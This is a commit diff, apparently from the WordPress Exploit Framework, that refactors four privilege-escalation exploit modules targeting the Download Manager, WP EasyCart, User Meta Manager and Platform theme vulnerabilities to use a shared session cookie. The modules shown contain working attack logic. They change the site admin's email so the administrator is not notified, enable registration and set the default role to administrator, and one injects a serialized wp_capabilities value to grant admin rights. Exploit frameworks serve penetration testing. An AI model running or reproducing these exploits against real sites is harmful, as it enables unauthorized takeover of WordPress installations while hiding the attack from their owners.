Update modules not using declarative authentication

Author: rastating

modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb

@@ -8,9 +8,11 @@ def initialize
 
     update_info(
       name: 'Download Manager Authenticated Privilege Escalation',
-      desc: 'The Download Manager plugin, in versions 2.8.4 to 2.8.7, '\
-            'allows authenticated users to escalate their user role to '\
-            'that of an administrator.',
+      desc: %(
+        The Download Manager plugin, in versions 2.8.4 to 2.8.7,
+        allows authenticated users to escalate their user role to
+        that of an administrator.
+      ),
       author: [
         'James Golovich', # Disclosure
         'rastating'       # WPXF module
@@ -21,39 +23,19 @@ def initialize
       ],
       date: 'Jan 19 2016'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'username',
-        desc: 'The username to authenticate with',
-        default: Utility::Text.rand_alpha(10)
-      ),
-      StringOption.new(
-        name: 'password',
-        desc: 'The password to authenticate with',
-        default: Utility::Text.rand_alpha(rand(10..20))
-      )
-    ])
-  end
-
-  def username
-    normalized_option_value('username')
-  end
-
-  def password
-    normalized_option_value('password')
   end
 
   def check
     check_plugin_version_from_readme('download-manager', '2.8.8', '2.8.4')
   end
 
+  def requires_authentication
+    true
+  end
+
   def run
     return false unless super
 
-    cookie = authenticate_with_wordpress(username, password)
-    return false unless cookie
-
     body = {
       'wpdm_profile' => {
         'display_name' => username,
@@ -73,7 +55,7 @@ def run
       res = execute_post_request(
         url: full_uri,
         body: body,
-        cookie: cookie
+        cookie: session_cookie
       )
 
       if res.code == 302

modules/auxiliary/priv_esc/easy_cart_privilege_escalation.rb

@@ -10,17 +10,20 @@ def initialize
 
     update_info(
       name: 'EasyCart Plugin Privilege Escalation',
-      desc: 'The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 '\
-            'allows authenticated users  of any user level to set any system '\
-            'option via a lack of validation in the ec_ajax_update_option and '\
-            'ec_ajax_clear_all_taxrates functions located in '\
-            '/inc/admin/admin_ajax_functions.php. The module first changes '\
-            'the admin e-mail address to prevent any notifications being sent '\
-            'to the actual administrator during the attack, re-enables user '\
-            'registration in case it has been disabled and sets the default '\
-            'role to be administrator. This will allow for the user to create '\
-            'a new account with admin privileges via the default registration '\
-            'page found at /wp-login.php?action=register.',
+      desc: %(
+        The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20
+        allows authenticated users  of any user level to set any system
+        option via a lack of validation in the ec_ajax_update_option and
+        ec_ajax_clear_all_taxrates functions located in /inc/admin/admin_ajax_functions.php.
+
+        The module first changes the admin e-mail address to prevent any
+        notifications being sent to the actual administrator during the
+        attack, re-enables user registration in case it has been disabled
+        and sets the default role to be administrator. This will allow
+        for the user to create a new account with admin privileges via
+        the default registration page found at /wp-login.php?action=register.
+      ),
+      desc_preformatted: true,
       author: [
         'rastating' # Discovery and WPXF module
       ],
@@ -31,69 +34,51 @@ def initialize
       ],
       date: 'Feb 25 2015'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'username',
-        desc: 'The WordPress username to authenticate with'
-      ),
-      StringOption.new(
-        name: 'password',
-        desc: 'The WordPress password to authenticate with'
-      )
-    ])
   end
 
   def check
     check_plugin_version_from_readme('wp-easycart', '3.0.21', '1.1.30')
   end
 
-  def username
-    datastore['username']
-  end
-
-  def password
-    datastore['password']
+  def requires_authentication
+    true
   end
 
-  def set_wp_option(name, value, cookie)
+  def set_wp_option(name, value)
     res = execute_post_request(
       url: wordpress_url_admin_ajax,
       params: { 'action' => 'ec_ajax_update_option' },
       body: { 'option_name' => name, 'option_value' => value },
-      cookie: cookie
+      cookie: session_cookie
     )
 
     if res.nil?
       emit_error 'No response from the target', true
-    else
-      emit_warning "Server responded with code #{res.code}", true if res.code != 200
+    elsif res.code != 200
+      emit_warning "Server responded with code #{res.code}", true
     end
 
-    return res
+    res
   end
 
   def run
     return false unless super
 
-    cookie = authenticate_with_wordpress(username, password)
-    return false unless cookie
-
     new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
     emit_info "Changing admin e-mail address to #{new_email}..."
-    if set_wp_option('admin_email', new_email, cookie).nil?
+    if set_wp_option('admin_email', new_email).nil?
       emit_error 'Failed to change the admin e-mail address'
       return false
     end
 
     emit_info 'Enabling user registrations...'
-    if set_wp_option('users_can_register', 1, cookie).nil?
+    if set_wp_option('users_can_register', 1).nil?
       emit_error 'Failed to enable user registrations'
       return false
     end
 
     emit_info 'Setting the default user role...'
-    if set_wp_option('default_role', 'administrator', cookie).nil?
+    if set_wp_option('default_role', 'administrator').nil?
       emit_error 'Failed to set the default user role'
       return false
     end

modules/auxiliary/priv_esc/platform_privilege_escalation.rb

@@ -9,17 +9,20 @@ def initialize
 
     update_info(
       name: 'Platform Theme Privilege Escalation',
-      desc: 'This module exploits a privilege escalation vulnerability in '\
-            'versions < 1.4.4 of the Platform theme which allows authenticated '\
-            'users of any level to update any WordPress option.'\
-            "\n"\
-            'The module first changes the admin e-mail address to prevent any '\
-            'notifications being sent to the actual administrator during the '\
-            'attack, re-enables user registration in case it has been '\
-            'disabled and sets the default role to be administrator. '\
-            'This will allow for the user to create a new account with admin '\
-            'privileges via the default registration page found at '\
-            '/wp-login.php?action=register.',
+      desc: %(
+        This module exploits a privilege escalation vulnerability in
+        versions < 1.4.4 of the Platform theme which allows authenticated
+        users of any level to update any WordPress option.
+
+        The module first changes the admin e-mail address to prevent any
+        notifications being sent to the actual administrator during the
+        attack, re-enables user registration in case it has been
+        disabled and sets the default role to be administrator.
+        This will allow for the user to create a new account with admin
+        privileges via the default registration page found at
+        /wp-login.php?action=register.
+      ),
+      desc_preformatted: true,
       author: [
         'Marc-Alexandre Montpas', # Vulnerability discovery
         'rastating'               # WPXF module
@@ -30,39 +33,22 @@ def initialize
       ],
       date: 'Jan 21 2015'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'username',
-        desc: 'The WordPress username to authenticate with',
-        required: true
-      ),
-      StringOption.new(
-        name: 'password',
-        desc: 'The WordPress password to authenticate with',
-        required: true
-      )
-    ])
-  end
-
-  def username
-    datastore['username']
-  end
-
-  def password
-    datastore['password']
   end
 
   def check
     check_theme_version_from_style('platform', '1.4.4')
   end
 
-  def set_wp_option(name, value, cookie)
+  def requires_authentication
+    true
+  end
+
+  def set_wp_option(name, value)
     res = execute_post_request(
       url: wordpress_url_admin_ajax,
       params: { 'action' => 'pagelines_ajax_save_option' },
       body: { 'option_name' => name, 'option_value' => value },
-      cookie: cookie
+      cookie: session_cookie
     )
 
     if res.nil?
@@ -73,30 +59,27 @@ def set_wp_option(name, value, cookie)
       emit_success "Option \"#{name}\" appears to have been set", true
     end
 
-    return res
+    res
   end
 
   def run
     return false unless super
 
-    cookie = authenticate_with_wordpress(username, password)
-    return false unless cookie
-
     new_email = "#{Utility::Text.rand_alpha(5)}@#{Utility::Text.rand_alpha(5)}.com"
     emit_info "Changing admin e-mail address to #{new_email}..."
-    if set_wp_option('admin_email', new_email, cookie).nil?
+    if set_wp_option('admin_email', new_email).nil?
       emit_error 'Failed to change the admin e-mail address'
       return false
     end
 
     emit_info 'Enabling user registrations...'
-    if set_wp_option('users_can_register', 1, cookie).nil?
+    if set_wp_option('users_can_register', 1).nil?
       emit_error 'Failed to enable user registrations'
       return false
     end
 
     emit_info 'Setting the default user role...'
-    if set_wp_option('default_role', 'administrator', cookie).nil?
+    if set_wp_option('default_role', 'administrator').nil?
       emit_error 'Failed to set the default user role'
       return false
     end

modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb

@@ -8,9 +8,11 @@ def initialize
 
     update_info(
       name: 'User Meta Manager <= 3.4.6 Privilege Escalation',
-      desc: 'The User Meta Manager plugin, up to and including version '\
-            '3.4.6, allows authenticated users of any level to update the '\
-            'role of any user to be an administrator.',
+      desc: %(
+        The User Meta Manager plugin, up to and including version
+        3.4.6, allows authenticated users of any level to update the
+        role of any user to be an administrator.
+      ),
       author: [
         'Panagiotis Vagenas', # Vulnerability discovery
         'rastating'           # WPXF module
@@ -27,26 +29,12 @@ def initialize
         name: 'user_id',
         desc: 'The ID of the user to make an admin',
         required: true
-      ),
-      StringOption.new(
-        name: 'username',
-        desc: 'The username to register with',
-        default: Utility::Text.rand_alpha(10)
-      ),
-      StringOption.new(
-        name: 'password',
-        desc: 'The password to register with',
-        default: Utility::Text.rand_alpha(rand(10..20))
       )
     ])
   end
 
-  def username
-    normalized_option_value('username')
-  end
-
-  def password
-    normalized_option_value('password')
+  def requires_authentication
+    true
   end
 
   def user_id
@@ -60,9 +48,6 @@ def check
   def run
     return false unless super
 
-    cookie = authenticate_with_wordpress(username, password)
-    return false unless cookie
-
     res = execute_post_request(
       url: wordpress_url_admin_ajax,
       params: {
@@ -75,7 +60,7 @@ def run
         'umm_meta_value[]' => 'a:1:{s:13:"administrator";b:1;}',
         'umm_meta_key[]' => 'wp_capabilities'
       },
-      cookie: cookie
+      cookie: session_cookie
     )
 
     if res.code == 200 && res.body =~ /Meta data successfully updated/i